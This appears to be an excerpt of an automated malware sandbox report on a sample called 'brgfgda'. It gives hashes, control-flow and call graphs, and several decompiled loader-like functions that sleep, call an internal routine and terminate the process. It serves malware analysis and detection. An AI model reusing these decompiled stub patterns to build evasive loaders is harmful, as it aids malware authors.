                        • Instruction ID: c491964785825148a0957e6f868511771f859eba064c7330ccfda3a6924b3f61
                        • Opcode Fuzzy Hash: af0d3c0451304eea9a95bfbcf33a37b8699cda851cd8c30db079f59d0d7bd2d6
                        • Instruction Fuzzy Hash: 1C012170C0525CEEDF10DBA8C5187AEBFB5AF41308F1480D9C4092B281D7769B59CBA6
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 84 25d0042-25d0054 85 25d0057-25d006a call 25d00c3 84->85 88 25d006c-25d006e 85->88 89 25d0070-25d008d 85->89 88->85 90 25d008f-25d00a2 call 25d00c3 89->90 93 25d00ac-25d00c0 90->93 94 25d00a4-25d00aa 90->94 94->90
                        Memory Dump Source
                        • Source File: 00000010.00000002.410370098.00000000025D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 025D0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_25d0000_brgfgda.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                        • Instruction ID: 03382b8ae3d5063d7adfaf952730672225147919a740b713990e2c4c17eccf05
                        • Opcode Fuzzy Hash: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                        • Instruction Fuzzy Hash: 1A117C72340100AFEB64DE69DC90EB673EAFB88320B998165E908CB351D676E801CB64
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Execution Graph

                        Execution Coverage:6.1%
                        Dynamic/Decrypted Code Coverage:0%
                        Signature Coverage:0%
                        Total number of Nodes:19
                        Total number of Limit Nodes:0
                        execution_graph 668 402ad1 669 402ad2 668->669 671 402b56 669->671 672 40180c 669->672 673 40181b 672->673 674 40183e Sleep 673->674 676 401859 674->676 675 40186a NtTerminateProcess 677 401876 675->677 676->675 677->671 682 401818 683 40181b 682->683 684 40183e Sleep 683->684 686 401859 684->686 685 40186a NtTerminateProcess 687 401876 685->687 686->685 688 402a9d 689 402ad2 688->689 690 40180c 2 API calls 689->690 691 402b56 689->691 690->691

                        Callgraph

                        • Executed
                        • Not Executed
                        • Opacity -> Relevance
                        • Disassembly available
                        callgraph 0 Function_00401246 1 Function_00401748 2 Function_00401BC9 3 Function_00402ACE 53 Function_0040180C 3->53 4 Function_004011D0 5 Function_00402AD1 5->53 6 Function_00401DD3 7 Function_00401AD5 8 Function_004011D7 9 Function_00402B58 10 Function_00402DD8 11 Function_00402E59 12 Function_004023DB 13 Function_00402E5C 14 Function_004027DC 15 Function_0040195D 16 Function_0040275E 17 Function_004010DF 18 Function_00402DE2 19 Function_00401064 20 Function_004016E4 21 Function_00402B66 22 Function_00401D66 23 Function_00402F6A 24 Function_0040136B 25 Function_004011EB 26 Function_00402D6E 27 Function_004025EF 28 Function_00402BEF 29 Function_00402E75 30 Function_00402D75 31 Function_00402575 32 Function_004015F5 33 Function_00402DF5 34 Function_00402CF7 35 Function_00402D79 36 Function_004017F9 37 Function_0040187A 38 Function_00402B7A 39 Function_0040157F 40 Function_00402E7F 41 Function_004013FF 42 Function_00401381 43 Function_00402102 44 Function_00401E82 45 Function_00402B82 46 Function_00402E83 47 Function_00401884 48 Function_00401705 49 Function_00402706 50 Function_00401786 51 Function_00401686 52 Function_0040188B 53->42 54 Function_0040138C 55 Function_00401A8C 56 Function_00402993 57 Function_00402E14 58 Function_00401894 59 Function_00402794 60 Function_00402E94 61 Function_00401715 62 Function_00401297 63 Function_00401818 63->42 64 Function_00401898 65 Function_00402E98 66 Function_0040131A 67 Function_0040259B 68 Function_00402A9D 68->53 69 Function_0040281D 70 Function_0040139D 71 Function_00402E20 72 Function_004013A0 73 Function_00401822 73->42 74 Function_00401826 74->42 75 Function_00401427 76 Function_0040212C 77 Function_00401D31 78 Function_00401D32 79 Function_00401CB2 80 Function_00402D33 80->4 81 Function_00401834 81->42 82 Function_00402635 83 Function_00402DB9 84 Function_00401D3D

                        Control-flow Graph

                        C-Code - Quality: 23%
                        			E0040180C(void* __eflags, void* __fp0, intOrPtr* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
                        				char _v8;
                        				void* __ebx;
                        				void* __edi;
                        				void* __esi;
                        				void* __ebp;
                        				void* _t11;
                        				void* _t16;
                        				intOrPtr* _t17;
                        				void* _t19;
                        				void* _t20;
                        				void* _t21;
                        
                        				_t22 = __eflags;
                        				L00401140(0x183e, _t16, _t20, _t21, __eflags, __fp0);
                        				_t17 = _a4;
                        				Sleep(0x1388);
                        				_t11 = E00401381(_t19, _t22, _t17, _a8, _a12,  &_v8); // executed
                        				if(_t11 != 0) {
                        					_push(_a16);
                        					_push(_v8);
                        					_push(_t11);
                        					_push(_t17); // executed
                        					L00401455(0x60, _t19, _t20); // executed
                        				}
                        				 *_t17(0xffffffff, 0); // executed
                        				_t17 = _t17 + 0x60;
                        				_push(0x60);
                        				asm("pushad");
                        				__ecx =  *__esp;
                        				__esp = __esp + 4;
                        				return __eax;
                        			}














                        0x0040180c
                        0x00401839
                        0x0040183e
                        0x00401846
                        0x00401854
                        0x0040185b
                        0x0040185d
                        0x00401860
                        0x00401863
                        0x00401864
                        0x00401865
                        0x00401865
                        0x0040186e
                        0x0040187a
                        0x0040188a
                        0x0040188b
                        0x0040188c
                        0x0040188f
                        0x004018a2

                        APIs
                        • Sleep.KERNELBASE(00001388), ref: 00401846
                        • NtTerminateProcess.NTDLL(000000FF,00000000,?,?,?,?), ref: 0040186E
                        Memory Dump Source
                        • Source File: 00000012.00000002.416451305.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_18_2_400000_brgfgda.jbxd
                        Similarity
                        • API ID: ProcessSleepTerminate
                        • String ID:
                        • API String ID: 417527130-0
                        • Opcode ID: 48605b2c447a37bcbfe7e2e744f1bc94e20697bf77b90fed00f3eac78df6e713
                        • Instruction ID: 439418bc6b8cc85bb90c3f715c5c8777bd26b3ffbf7cafd5698f886abb68661d
                        • Opcode Fuzzy Hash: 48605b2c447a37bcbfe7e2e744f1bc94e20697bf77b90fed00f3eac78df6e713
                        • Instruction Fuzzy Hash: DA014F73608208E7DB057A968C41ABA36299B04754F24C137BA13791F1D63DCB12A76B
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Control-flow Graph

                        APIs
                        • Sleep.KERNELBASE(00001388), ref: 00401846
                        • NtTerminateProcess.NTDLL(000000FF,00000000,?,?,?,?), ref: 0040186E
                        Memory Dump Source
                        • Source File: 00000012.00000002.416451305.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_18_2_400000_brgfgda.jbxd
                        Similarity
                        • API ID: ProcessSleepTerminate
                        • String ID:
                        • API String ID: 417527130-0
                        • Opcode ID: 735c82c96fcbea7bf12158d9a4ead4c90c858f64146e6fe56e595d73795e62df
                        • Instruction ID: 3ccd72cbf6c862e7ac88a574d3d4d63140f03618044998c1cc11cf15f2003e8a
                        • Opcode Fuzzy Hash: 735c82c96fcbea7bf12158d9a4ead4c90c858f64146e6fe56e595d73795e62df
                        • Instruction Fuzzy Hash: F5F03133604204E7DB047E96CC41ABA36199B04754F24C537BA13791F1D63DCB12A76B
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Control-flow Graph

                        C-Code - Quality: 17%
                        			E00401822(void* __ebx, void* __edi, void* __esi, void* __eflags, void* __fp0) {
                        				void* _t11;
                        				intOrPtr* _t17;
                        				void* _t19;
                        				void* _t22;
                        
                        				_t23 = __eflags;
                        				asm("out 0x95, eax");
                        				L00401140(0x183e, __ebx, __edi, __esi, __eflags, __fp0);
                        				_t17 =  *((intOrPtr*)(_t22 + 8));
                        				Sleep(0x1388);
                        				_t11 = E00401381(_t19, _t23, _t17,  *((intOrPtr*)(_t22 + 0xc)),  *((intOrPtr*)(_t22 + 0x10)), _t22 - 4); // executed
                        				if(_t11 != 0) {
                        					_push( *((intOrPtr*)(_t22 + 0x14)));
                        					_push( *((intOrPtr*)(_t22 - 4)));
                        					_push(_t11);
                        					_push(_t17); // executed
                        					L00401455(0x60, _t19, __edi); // executed
                        				}
                        				 *_t17(0xffffffff, 0); // executed
                        				_t17 = _t17 + 0x60;
                        				_push(0x60);
                        				asm("pushad");
                        				__ecx =  *__esp;
                        				__esp = __esp + 4;
                        				__eax = L00401140(__eax, __ebx, __edi, __esi, __eflags, __fp0);
                        				_pop(__edi);
                        				_pop(__esi);
                        				_pop(__ebx);
                        				__esp = __ebp;
                        				_pop(__ebp);
                        				return __eax;
                        			}







                        0x00401822
                        0x00401822
                        0x00401839
                        0x0040183e
                        0x00401846
                        0x00401854
                        0x0040185b
                        0x0040185d
                        0x00401860
                        0x00401863
                        0x00401864
                        0x00401865
                        0x00401865
                        0x0040186e
                        0x0040187a
                        0x0040188a
                        0x0040188b
                        0x0040188c
                        0x0040188f
                        0x00401899
                        0x0040189e
                        0x0040189f
                        0x004018a0
                        0x004018a1
                        0x004018a1
                        0x004018a2

                        APIs
                        • Sleep.KERNELBASE(00001388), ref: 00401846
                        • NtTerminateProcess.NTDLL(000000FF,00000000,?,?,?,?), ref: 0040186E
                        Memory Dump Source
                        • Source File: 00000012.00000002.416451305.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_18_2_400000_brgfgda.jbxd
                        Similarity
                        • API ID: ProcessSleepTerminate
                        • String ID:
                        • API String ID: 417527130-0
                        • Opcode ID: a194699a847889707888bec4c97d3b5ba1a2af2b109fbbf12831e69875d24230
                        • Instruction ID: 86529ff08739d4d45ab2b2fe3aa627bb4dd9aa569924de5dc1b0fc6937d585b1
                        • Opcode Fuzzy Hash: a194699a847889707888bec4c97d3b5ba1a2af2b109fbbf12831e69875d24230
                        • Instruction Fuzzy Hash: FEF03133604204EBDB047E96C841ABA36299B44754F24C537BA13B91F1D63DCB12A76B
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Control-flow Graph

                        C-Code - Quality: 17%
                        			E00401826(void* __ebx, void* __edi, void* __esi, void* __eflags, void* __fp0) {
                        				void* _t8;
                        				void* _t11;
                        				intOrPtr* _t17;
                        				void* _t19;
                        				void* _t22;
                        
                        				_t23 = __eflags;
                        				asm("sbb ebx, ebp");
                        				L00401140(_t8, __ebx, __edi, __esi, __eflags, __fp0);
                        				_t17 =  *((intOrPtr*)(_t22 + 8));
                        				Sleep(0x1388);
                        				_t11 = E00401381(_t19, _t23, _t17,  *((intOrPtr*)(_t22 + 0xc)),  *((intOrPtr*)(_t22 + 0x10)), _t22 - 4); // executed
                        				if(_t11 != 0) {
                        					_push( *((intOrPtr*)(_t22 + 0x14)));
                        					_push( *((intOrPtr*)(_t22 - 4)));
                        					_push(_t11);
                        					_push(_t17); // executed
                        					L00401455(0x60, _t19, __edi); // executed
                        				}
                        				 *_t17(0xffffffff, 0); // executed
                        				_t17 = _t17 + 0x60;
                        				_push(0x60);
                        				asm("pushad");
                        				__ecx =  *__esp;
                        				__esp = __esp + 4;
                        				__eax = L00401140(__eax, __ebx, __edi, __esi, __eflags, __fp0);
                        				_pop(__edi);
                        				_pop(__esi);
                        				_pop(__ebx);
                        				__esp = __ebp;
                        				_pop(__ebp);
                        				return __eax;
                        			}








                        0x00401826
                        0x00401826
                        0x00401839
                        0x0040183e
                        0x00401846
                        0x00401854
                        0x0040185b
                        0x0040185d
                        0x00401860
                        0x00401863
                        0x00401864
                        0x00401865
                        0x00401865
                        0x0040186e
                        0x0040187a
                        0x0040188a
                        0x0040188b
                        0x0040188c
                        0x0040188f
                        0x00401899
                        0x0040189e
                        0x0040189f
                        0x004018a0
                        0x004018a1
                        0x004018a1
                        0x004018a2

                        APIs
                        • Sleep.KERNELBASE(00001388), ref: 00401846
                        • NtTerminateProcess.NTDLL(000000FF,00000000,?,?,?,?), ref: 0040186E
                        Memory Dump Source
                        • Source File: 00000012.00000002.416451305.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_18_2_400000_brgfgda.jbxd
                        Similarity
                        • API ID: ProcessSleepTerminate
                        • String ID:
                        • API String ID: 417527130-0
                        • Opcode ID: 19d43838bd81236491392686aac446d18c030aded37c005789754258c9c8d03d
                        • Instruction ID: 61297dcd7f948f961e89af5f5716b1062d194a974c17104e1ab0fce138cf61ec
                        • Opcode Fuzzy Hash: 19d43838bd81236491392686aac446d18c030aded37c005789754258c9c8d03d
                        • Instruction Fuzzy Hash: C4F04F33604208A7DB04BE96CC41AAA3719AB04754F248537BB13791E1DA3DCB12A72B
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Control-flow Graph

                        C-Code - Quality: 20%
                        			E00401834(void* __ebx, void* __edi, void* __esi, void* __eflags, void* __fp0) {
                        				void* _t10;
                        				void* _t13;
                        				intOrPtr* _t19;
                        				void* _t22;
                        				void* _t25;
                        
                        				_t26 = __eflags;
                        				L00401140(_t10, __ebx, __edi, __esi, __eflags, __fp0);
                        				_t19 =  *((intOrPtr*)(_t25 + 8));
                        				Sleep(0x1388);
                        				_t13 = E00401381(_t22, _t26, _t19,  *((intOrPtr*)(_t25 + 0xc)),  *((intOrPtr*)(_t25 + 0x10)), _t25 - 4); // executed
                        				if(_t13 != 0) {
                        					_push( *((intOrPtr*)(_t25 + 0x14)));
                        					_push( *((intOrPtr*)(_t25 - 4)));
                        					_push(_t13);
                        					_push(_t19); // executed
                        					L00401455(0x60, _t22, __edi); // executed
                        				}
                        				 *_t19(0xffffffff, 0); // executed
                        				_t19 = _t19 + 0x60;
                        				_push(0x60);
                        				asm("pushad");
                        				__ecx =  *__esp;
                        				__esp = __esp + 4;
                        				__eax = L00401140(__eax, __ebx, __edi, __esi, __eflags, __fp0);
                        				_pop(__edi);
                        				_pop(__esi);
                        				_pop(__ebx);
                        				__esp = __ebp;
                        				_pop(__ebp);
                        				return __eax;
                        			}








                        0x00401834
                        0x00401839
                        0x0040183e
                        0x00401846
                        0x00401854
                        0x0040185b
                        0x0040185d
                        0x00401860
                        0x00401863
                        0x00401864
                        0x00401865
                        0x00401865
                        0x0040186e
                        0x0040187a
                        0x0040188a
                        0x0040188b
                        0x0040188c
                        0x0040188f
                        0x00401899
                        0x0040189e
                        0x0040189f
                        0x004018a0
                        0x004018a1
                        0x004018a1
                        0x004018a2

                        APIs
                        • Sleep.KERNELBASE(00001388), ref: 00401846
                        • NtTerminateProcess.NTDLL(000000FF,00000000,?,?,?,?), ref: 0040186E
                        Memory Dump Source
                        • Source File: 00000012.00000002.416451305.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_18_2_400000_brgfgda.jbxd
                        Similarity
                        • API ID: ProcessSleepTerminate
                        • String ID:
                        • API String ID: 417527130-0
                        • Opcode ID: 0870dc026937b1eb0e2e38101574af244100116dae67d2ee4212e122303e269f
                        • Instruction ID: 4e4f5f6328981cf1385f7e82c295c95f43d6d852bc8dfc3b1875bfb827a549ac
                        • Opcode Fuzzy Hash: 0870dc026937b1eb0e2e38101574af244100116dae67d2ee4212e122303e269f
                        • Instruction Fuzzy Hash: BDF04932604208ABDB04BF92CC81ABA3329AB04754F248537BA12790F1D639C612A72B
                        Uniqueness

                        Uniqueness Score: -1.00%